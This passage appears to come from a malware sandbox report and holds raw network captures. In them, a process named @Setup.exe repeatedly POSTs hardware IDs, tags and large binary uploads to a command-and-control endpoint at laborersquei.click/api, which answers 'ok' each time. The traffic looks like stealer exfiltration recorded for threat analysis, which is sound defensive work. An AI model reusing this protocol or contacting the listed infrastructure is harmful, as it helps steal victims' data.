                                                                                                                                                                                            2024-12-27 19:23:22 UTC15331OUTData Raw: 2d 2d 37 32 52 54 36 55 47 34 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 34 35 32 34 42 42 39 34 32 46 36 45 39 44 34 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 37 32 52 54 36 55 47 34 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 32 52 54 36 55 47 34 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 37 32 52 54 36 55 47 34 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                                                                                                            Data Ascii: --72RT6UG4DContent-Disposition: form-data; name="hwid"D4524BB942F6E9D4D9AC212D15D33917--72RT6UG4DContent-Disposition: form-data; name="pid"2--72RT6UG4DContent-Disposition: form-data; name="lid"hRjzG3--TRON--72RT6UG4DContent-Dispo
                                                                                                                                                                                            2024-12-27 19:23:22 UTC2777OUTData Raw: 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b 56 2d 7b
                                                                                                                                                                                            Data Ascii: \f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5V-{
                                                                                                                                                                                            2024-12-27 19:23:23 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Fri, 27 Dec 2024 19:23:23 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Set-Cookie: PHPSESSID=v18a9ei8oeihtsce3a9j6hhjcd; expires=Tue, 22 Apr 2025 13:10:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qdYrBWu90PqM9rKyNlvD9kPywIhCw0E8Yb9MkQcJnzfpMY59YmkIsP9LW2MG35cJyUUxVbmVfCJog9ryvhHYfqK635FhXHSiYYiqHhVMJn7ssuv9RDnTm9GbY46sgFZsZZX9izM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8f8baf4a1d6fc425-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1519&min_rtt=1511&rtt_var=583&sent=12&recv=22&lost=0&retrans=0&sent_bytes=2846&recv_bytes=19063&delivery_rate=1849271&cwnd=240&unsent_bytes=0&cid=4092aa2bce71fa6c&ts=1004&x=0"
                                                                                                                                                                                            2024-12-27 19:23:23 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                            2024-12-27 19:23:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            3192.168.2.449738172.67.166.494431900C:\Users\user\Desktop\@Setup.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-12-27 19:23:24 UTC284OUTPOST /api HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=91FJXP8SKHS67CAYYVU
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                            Content-Length: 8789
                                                                                                                                                                                            Host: laborersquei.click
                                                                                                                                                                                            2024-12-27 19:23:24 UTC8789OUTData Raw: 2d 2d 39 31 46 4a 58 50 38 53 4b 48 53 36 37 43 41 59 59 56 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 34 35 32 34 42 42 39 34 32 46 36 45 39 44 34 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 39 31 46 4a 58 50 38 53 4b 48 53 36 37 43 41 59 59 56 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 39 31 46 4a 58 50 38 53 4b 48 53 36 37 43 41 59 59 56 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52
                                                                                                                                                                                            Data Ascii: --91FJXP8SKHS67CAYYVUContent-Disposition: form-data; name="hwid"D4524BB942F6E9D4D9AC212D15D33917--91FJXP8SKHS67CAYYVUContent-Disposition: form-data; name="pid"2--91FJXP8SKHS67CAYYVUContent-Disposition: form-data; name="lid"hRjzG3--TR
                                                                                                                                                                                            2024-12-27 19:23:25 UTC1134INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Fri, 27 Dec 2024 19:23:25 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Set-Cookie: PHPSESSID=d8b6bffbr4lmd1c9do097l1f58; expires=Tue, 22 Apr 2025 13:10:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xpWhEe8sshegUDYdwE3LyUHtkEIxunpsfku%2FVbKhx8ITyFBLv4NMk%2BV6M2nR%2BSmGq52Szsz58tGXLdC1Rh6ICJLpxf3MGNdG0q1knQm2Vcd0ak%2FRQc2%2F9KvvlRgZAbT7yjc46XY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8f8baf594f6a41e9-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1676&min_rtt=1663&rtt_var=651&sent=10&recv=14&lost=0&retrans=0&sent_bytes=2846&recv_bytes=9731&delivery_rate=1646926&cwnd=249&unsent_bytes=0&cid=880f84d588e5120f&ts=839&x=0"
                                                                                                                                                                                            2024-12-27 19:23:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                            2024-12-27 19:23:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            4192.168.2.449740172.67.166.494431900C:\Users\user\Desktop\@Setup.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-12-27 19:23:27 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=VDL8KRYX6OBB6SYO1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                            Content-Length: 20430
                                                                                                                                                                                            Host: laborersquei.click
                                                                                                                                                                                            2024-12-27 19:23:27 UTC15331OUTData Raw: 2d 2d 56 44 4c 38 4b 52 59 58 36 4f 42 42 36 53 59 4f 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 34 35 32 34 42 42 39 34 32 46 36 45 39 44 34 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 56 44 4c 38 4b 52 59 58 36 4f 42 42 36 53 59 4f 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 56 44 4c 38 4b 52 59 58 36 4f 42 42 36 53 59 4f 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d
                                                                                                                                                                                            Data Ascii: --VDL8KRYX6OBB6SYO1Content-Disposition: form-data; name="hwid"D4524BB942F6E9D4D9AC212D15D33917--VDL8KRYX6OBB6SYO1Content-Disposition: form-data; name="pid"3--VDL8KRYX6OBB6SYO1Content-Disposition: form-data; name="lid"hRjzG3--TRON--
                                                                                                                                                                                            2024-12-27 19:23:27 UTC5099OUTData Raw: 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00
                                                                                                                                                                                            Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                                                                                                                                            2024-12-27 19:23:28 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Fri, 27 Dec 2024 19:23:27 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Set-Cookie: PHPSESSID=26ahqr10pemvq0hiri1q4koepb; expires=Tue, 22 Apr 2025 13:10:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CbIG6rAkhEhf1idWzm4revp3NoryvN5zSwHAFxIBeGJD6m98Ny1jt8hmesXw09X2nwmkaIUsfv%2FuTmpX3kcXUcXLxQvMrtUixCF%2FqwEfSMTQECMHPkyR07apBS9yQyGZY2SK1zk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8f8baf67bedf4228-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1722&min_rtt=1718&rtt_var=652&sent=14&recv=25&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21393&delivery_rate=1666666&cwnd=209&unsent_bytes=0&cid=131ed9b8c8334192&ts=911&x=0"
                                                                                                                                                                                            2024-12-27 19:23:28 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                            2024-12-27 19:23:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            5192.168.2.449742172.67.166.494431900C:\Users\user\Desktop\@Setup.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-12-27 19:23:29 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=GB2XT5HQK
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                            Content-Length: 7075
                                                                                                                                                                                            Host: laborersquei.click
                                                                                                                                                                                            2024-12-27 19:23:29 UTC7075OUTData Raw: 2d 2d 47 42 32 58 54 35 48 51 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 34 35 32 34 42 42 39 34 32 46 36 45 39 44 34 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 47 42 32 58 54 35 48 51 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 47 42 32 58 54 35 48 51 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 47 42 32 58 54 35 48 51 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                                                                                                            Data Ascii: --GB2XT5HQKContent-Disposition: form-data; name="hwid"D4524BB942F6E9D4D9AC212D15D33917--GB2XT5HQKContent-Disposition: form-data; name="pid"1--GB2XT5HQKContent-Disposition: form-data; name="lid"hRjzG3--TRON--GB2XT5HQKContent-Dispo
                                                                                                                                                                                            2024-12-27 19:23:30 UTC1134INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Fri, 27 Dec 2024 19:23:30 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Set-Cookie: PHPSESSID=tgea9393slij5ci630c87uh3go; expires=Tue, 22 Apr 2025 13:10:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cuCaIwYX6zFI4k2GXWpWIR84eWKEfSjsdwDnGPckv559BX8dghr0lTdnwFcVpJ4k%2B1p4oWx3BiVEehx0DtA%2BtTEHyD91adewOh%2B4QuFUQ%2Bqn2H69i3kkn%2B78zY43ncCG8csRGpE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8f8baf782fdf43c9-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1726&min_rtt=1640&rtt_var=677&sent=11&recv=13&lost=0&retrans=0&sent_bytes=2847&recv_bytes=7985&delivery_rate=1780487&cwnd=230&unsent_bytes=0&cid=38a7b3dc4961822d&ts=799&x=0"
                                                                                                                                                                                            2024-12-27 19:23:30 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                            2024-12-27 19:23:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            6192.168.2.449743172.67.166.494431900C:\Users\user\Desktop\@Setup.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-12-27 19:23:31 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=JWWXZIDCMJA
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                            Content-Length: 1222
                                                                                                                                                                                            Host: laborersquei.click
                                                                                                                                                                                            2024-12-27 19:23:31 UTC1222OUTData Raw: 2d 2d 4a 57 57 58 5a 49 44 43 4d 4a 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 34 35 32 34 42 42 39 34 32 46 36 45 39 44 34 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 4a 57 57 58 5a 49 44 43 4d 4a 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4a 57 57 58 5a 49 44 43 4d 4a 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 4a 57 57 58 5a 49 44 43 4d 4a 41 0d 0a 43 6f 6e 74 65
                                                                                                                                                                                            Data Ascii: --JWWXZIDCMJAContent-Disposition: form-data; name="hwid"D4524BB942F6E9D4D9AC212D15D33917--JWWXZIDCMJAContent-Disposition: form-data; name="pid"1--JWWXZIDCMJAContent-Disposition: form-data; name="lid"hRjzG3--TRON--JWWXZIDCMJAConte
                                                                                                                                                                                            2024-12-27 19:23:32 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Fri, 27 Dec 2024 19:23:32 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Set-Cookie: PHPSESSID=gfvl3g16hvfmgjroijtba2jrt3; expires=Tue, 22 Apr 2025 13:10:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=al74rVigmxIFeKo3vfiPTvMPrIPuBzZmHoeZPa%2FBGRDVz7l2ju2rENcEUd5GjzUXtdeFzcctmns8k9bZitsQcZnSUpMjZLS8M2E%2BL9Iw3x73cF3iF48l7ux42PpF5%2BOQNftpcMc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8f8baf859e3f43b8-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1995&min_rtt=1588&rtt_var=1411&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2134&delivery_rate=602061&cwnd=231&unsent_bytes=0&cid=c2c82e1738f1f07e&ts=795&x=0"
                                                                                                                                                                                            2024-12-27 19:23:32 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                            2024-12-27 19:23:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            7192.168.2.449744172.67.166.494431900C:\Users\user\Desktop\@Setup.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-12-27 19:23:34 UTC285OUTPOST /api HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=Y8ZKNG619S0MX99IOM
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                            Content-Length: 585180
                                                                                                                                                                                            Host: laborersquei.click
                                                                                                                                                                                            2024-12-27 19:23:34 UTC15331OUTData Raw: 2d 2d 59 38 5a 4b 4e 47 36 31 39 53 30 4d 58 39 39 49 4f 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 34 35 32 34 42 42 39 34 32 46 36 45 39 44 34 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 59 38 5a 4b 4e 47 36 31 39 53 30 4d 58 39 39 49 4f 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 38 5a 4b 4e 47 36 31 39 53 30 4d 58 39 39 49 4f 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d
                                                                                                                                                                                            Data Ascii: --Y8ZKNG619S0MX99IOMContent-Disposition: form-data; name="hwid"D4524BB942F6E9D4D9AC212D15D33917--Y8ZKNG619S0MX99IOMContent-Disposition: form-data; name="pid"1--Y8ZKNG619S0MX99IOMContent-Disposition: form-data; name="lid"hRjzG3--TRON
                                                                                                                                                                                            2024-12-27 19:23:34 UTC15331OUTData Raw: d7 d3 b5 53 da 7d 5b 36 f6 3d 6b 58 2c 3c 16 18 a1 c2 87 b8 49 14 9e 04 cd 16 ca 52 a3 cf 29 52 ce 97 b1 7f 62 ec 50 7e f3 3f be 6a 51 8c 0b 1b d2 2f 26 1d bf b6 6a d6 bb ab 73 d8 16 19 15 55 c9 db 26 b3 dc 9c 26 ba f5 8a 9a 54 e2 a0 bd 4f e8 62 96 2a 36 a2 22 fe 38 13 78 1f 84 ca 2e d5 cc 94 5e e3 c7 0d 0c 6e e5 15 12 1f c3 5e ea 84 81 12 a5 4a 04 fd 79 7a a3 a1 36 66 e8 c8 d9 49 ed f0 bf 3e ee 13 b5 c1 dc 6e e9 27 38 f3 3f 2f 3c 38 b5 66 3e 23 d3 55 f5 20 5b 1d cd 9e 56 37 65 bf 7f 9f 0a d1 77 98 0a d9 d0 57 cd 3b d8 54 3d 51 0d 4a 92 f6 84 14 de 9d 69 e9 e2 3c 93 5f 81 1b e4 ef 81 b6 a0 ea e8 de 84 d3 9c 1d b3 85 26 61 ee 87 52 f6 e2 a6 19 43 2e 6e 3e ca 5d ab bc 21 bc 0d e7 f3 d7 d7 6b 0e 52 cf b3 d3 e7 7d 62 84 01 d0 8b a0 5a a3 52 68 96 45 62 f4 9f
                                                                                                                                                                                            Data Ascii: S}[6=kX,<IR)RbP~?jQ/&jsU&&TOb*6"8x.^n^Jyz6fI>n'8?/<8f>#U [V7ewW;T=QJi<_&aRC.n>]!kR}bZRhEb
